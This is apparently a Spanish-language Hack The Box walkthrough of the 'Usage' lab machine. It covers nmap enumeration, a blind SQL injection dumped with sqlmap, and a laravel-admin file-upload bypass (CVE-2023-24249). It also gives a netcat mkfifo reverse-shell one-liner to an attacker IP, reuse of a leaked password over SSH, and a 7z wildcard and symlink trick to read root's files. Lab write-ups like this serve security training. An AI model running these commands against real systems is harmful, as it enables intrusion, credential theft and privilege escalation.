# HTB - Usage

## Información General * **Nombre de la Máquina: Usage** * **IP de la Máquina:** 10.129.26.222 * **Sistema Operativo: Linux** * **Dificultad: Easy** * **Fecha de Publicación:** 13 Apr 2024 *** ## Enumeration ### Ping para obtener ruta de retorno Realizamos un ping a la máquina objetivo para verificar la conectividad y obtener información sobre la ruta utilizando la opción `-R` para incluir la ruta de retorno: {% code title="Kali Linux Machine" %} ```bash ping -c 1 10.129.26.222 -R ``` {% endcode %}

El valor de TTL (Time To Live) igual a 63 puede ser indicativo de que el sistema operativo de la máquina objetivo es Linux. El TTL es un valor en el campo de los paquetes IP que indica la duración que un paquete puede estar en una red antes de ser descartado. Linux establece por defecto el valor de TTL de sus paquetes IP en 64, que al pasar por un salto en la red se decrementa a 63. ### **Escaneo de puertos con Nmap** Luego, realizamos un escaneo de puertos utilizando Nmap para identificar los puertos abiertos en la máquina objetivo. Utilizamos las opciones `-p-` para escanear todos los puertos, `--open` para mostrar solo los puertos abiertos, `-sS` para un escaneo de tipo TCP SYN, `--min-rate 5000` para establecer la velocidad mínima de paquetes y `-vvv` para un nivel de verbosidad alto. Además, utilizamos `-n` para desactivar la resolución de DNS, `-Pn` para no realizar el escaneo de ping, y `-oG allPorts` para guardar la salida en un archivo con formato Greppable para luego utilizar nuestra función extractPorts:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.26.222 -oG allPorts
extractPorts allPorts

### **Escaneo detallado con Nmap** Posteriormente, realizamos un escaneo más detallado de los puertos identificados utilizando la opción `-sCV` para detección de versiones y scripts de enumeración de servicios. Específicamente, indicamos los puertos a escanear con `-p __PORTS__` (reemplazando `__PORTS__` con los puertos identificados en el paso anterior) y guardamos la salida en un archivo de texto con el nombre `targeted`: {% code title="Kali Linux Machine" %} ```bash sudo nmap -sCV -p22,80,8888 10.129.26.222 -oN targeted ``` {% endcode %} ```bash Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 21:11 EDT Nmap scan report for usage.htb (10.129.26.222) Host is up (0.31s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA) |_ 256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Daily Blogs 8888/tcp open http SimpleHTTPServer 0.6 (Python 3.10.12) |_http-title: Directory listing for / |_http-server-header: SimpleHTTP/0.6 Python/3.10.12 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.02 seconds ``` ### Modificando /etc/hosts Para añadir la entrada "10.129.179.64 active.htb" al archivo `/etc/hosts`, puedes usar el siguiente comando en la terminal: {% code title="Kali Linux Machine" overflow="wrap" %} ```bash echo "10.129.26.222 usage.htb " | sudo tee -a /etc/hosts ``` {% endcode %} ### Explorando usage.htb

Estas son las rutas que encuentro. Las cuales revisaré con Burpsuite para entenderlas mejor. Además tambien agregué admin.usage.htb a /etc/hosts. {% code title="List o f Links" %} ```bash usage.htb/login usage.htb/registration admin.usage.htb usage.htb/post-login usage.htb/forget-password admin.usage.htb/admin admin.usage.htb/admin/auth/login ``` {% endcode %} Creo mi cuenta en usage.htb/registration ```bash test@test.test : test123! ``` Intento resetear la clave en usage.htb/forget-password

## Blind SQLi en /forget-password Interceptamos la consulta con Burpsuite de /forget-password y nos percatamos de un posible BSQLi

Al hacer pruebas en el campo email, puedo identificar que quizás es vulnerable a SQLi, pero no demuestra ser una normal quizás un blind sqli, por lo que utilizaré SQLmap. Para ello copiaré el request que obtuve de Burpsuite y lo guardaré en un archivo request.txt {% code title="Burpsuite Request" %} ```bash POST /forget-password HTTP/1.1 Host: usage.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 70 Origin: http://usage.htb Connection: close Referer: http://usage.htb/forget-password Cookie: XSRF-TOKEN=eyJpdiI6IkZla0FnT29QRy9JVS9nQmVjdTZlOEE9PSIsInZhbHVlIjoiY2tXL0dvM29iS2hyZjk2U3JoZm1QTTFKQ2Y0LzNESG43ZXUvRkxJaGI0WWthSUxRaVI5b0l1VUJOaTlxWk53c1ZJZFdNdkZOck0vRVQ3M1VabGE3THd1N1UrT2JDUTVnNk1RS0NSZUFobjZpeUFQa1lBVHFxSy8wWkRWdGk4UG8iLCJtYWMiOiIyNjU5OGQ0NzQ2MjUwODcwNzdhNWU5YmE0ZjQ3ZTRhOWRiMmYyYWIwMzA4MDc4NWYyNTQ2ZTZhOGU0ZGVmYTYzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFMV0ZCQlJ6T0NoblZuTkt5bjI5OWc9PSIsInZhbHVlIjoiOUY4NnN5eGUvSkpINjhIeHJLd0hnNEsyeVNVb0EzdFhGTkxIZTZRdFYxeFdTVDEybE9YcWI1L1dQUVJiMDQvZExlMUtzaUpVZXI5UmlGdW5HU2pXL0NMbjVYVGJnNVp0ak94TGhTLzFjVGZIL1paWGlaNWk1UFBFQlpmcVhkamUiLCJtYWMiOiI2NjhiYzg0NjFkOWQ1OTg3ZjFkOTY4ODE3ZGU0ZDU4MzM5YmNkYWQxODIyNDIwYjdmOWRiNDU5ZDM2ODFjNGQ0IiwidGFnIjoiIn0%3D Upgrade-Insecure-Requests: 1 _token=NfCIRLM1PvC4PagbIi5GqaJkdlGveVbqNWPccOew&email=test%40test.test ``` {% endcode %} Luego utilizo SQLmap con el parametro -r {% code title="Kali Linux Machine" %} ```bash sqlmap -r request.txt --level 5 --risk 3 -p email --batch ``` {% endcode %}

### Explotando Blind SQLi con SQLmap Es blindsql así que puede tardar un poco mas de lo habitual. {% code title="Kali Linux Machine" %} ```bash sqlmap -r request.txt --level 5 --risk 3 -p email --batch --dbs --threads 10 sqlmap -r request.txt --level 5 --risk 3 -p email --batch -D usage_blog --threads 10 sqlmap -r request.txt --level 5 --risk 3 -p email --batch -D usage_blog -T admin_users -C username,password --dump --threads 10 ``` {% endcode %}

## Crackeamos el hash con john

Ingresamos con las credenciales en admin.usage.htb

## CVE-2023-24249 Y revisando encontramos que es un panel de administración Laravel 1.8.17, buscando en internet me encuentro con el `CVE-2023-24249` *`An arbitrary file upload vulnerability in laravel-admin v1.8.19 allows attackers to execute arbitrary code via a crafted PHP file.`* Se refierere a cuando vamos a cambiar el avatar de nuestro usuario Administador en [`http://admin.usage.htb/admin/auth/setting`](http://admin.usage.htb/admin/auth/setting)

{% hint style="info" %} Podemos encontrar un tutorial de como ejecutar este bypass aquí {% endhint %} Subimos nuestro archivo malicioso en formato `.JPG y al mismo tiempo interceptamos con Burpsuite.`

En `filename="pown.jpg"` le agrego **.php** a nuestro archivo quedando: `pown.jpg.php`, luego lo mando al Repeater (`CTRL + R)` -> Send ->`Follow Redirection`

Y luego vamos a la ruta donde debería estar nuestro archivo `admin.usage.htb/uploads/images/pown.jpg.php`

Te recomiendo que establezcas una **reverse shell** ya que después de unos minutos el archivo que subimos es eliminado y tendrás que bypassear de nuevo el uploader. Yo ejecuto el one liner: {% code title="Powny Shell" %} ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.8 7777 >/tmp/f ``` {% endcode %}

{% code title="Kali Linux Machine" %} ```bash script /dev/null -c /bin/bash export TERM=xterm stty raw -echo; fg ``` {% endcode %} ## Buscamos las credenciales del usuario Xander Lo primero que hice fue subir LinEnum para tener una visión mas amplia de mi objetivo, al parecer también hay otro usuario `Xander.` También me encontré con la existencia de varios archivos ocultos en el escritorio de `Dash.`

Después de revisar una por una encuentro una contraseña en el archivo **`.monitrc`**

```bash 3nc0d3d_pa$$w0rd ``` ## Ingresando como Xander Quiero creer que esta es la contraseña de `Xander` así que pruebo conectandome mediante SSH. {% code title="" %} ```bash ssh xander@usage.htb 3nc0d3d_pa$$w0rd ``` {% endcode %} ## Privilege Escalation {% code title="Kali Linux Machine" %} ```bash python3 -m http.server 8888 ``` {% endcode %} {% code title="Target Linux Machine" %} ```bash curl 10.10.14.8:8888/LinEnum.sh -o LinEnum.sh chmod +x LinEnum.sh ./LinEnum.sh ``` {% endcode %} {% code title="Target Linux Machine" %} ```bash sudo -l (ALL : ALL) NOPASSWD: /usr/bin/usage_management ``` {% endcode %} ```bash strings /usr/bin/usage_management ``` Nos damos cuenta que usa 7z para comprimir todo lo de /var/www/html/ y lo hace al final colocando "..\*", esto es una Wildcard y podemos abusar de ella. {% code title="Target Linux Machine" %} ```bash sudo /usr/bin/usage_management Choose an option: Project Backup Backup MySQL data Reset admin password ``` {% endcode %} {% code title="Target Linux Machine" %} ```bash cd /var/www/html/ touch '@root.txt' ln -s -r /root/root.txt root.txt sudo /usr/bin/usage_management #Opcion 1 (Project Backup) ``` {% endcode %} Y mientras se ejecuta el binario debería lanzarnos el root.txt.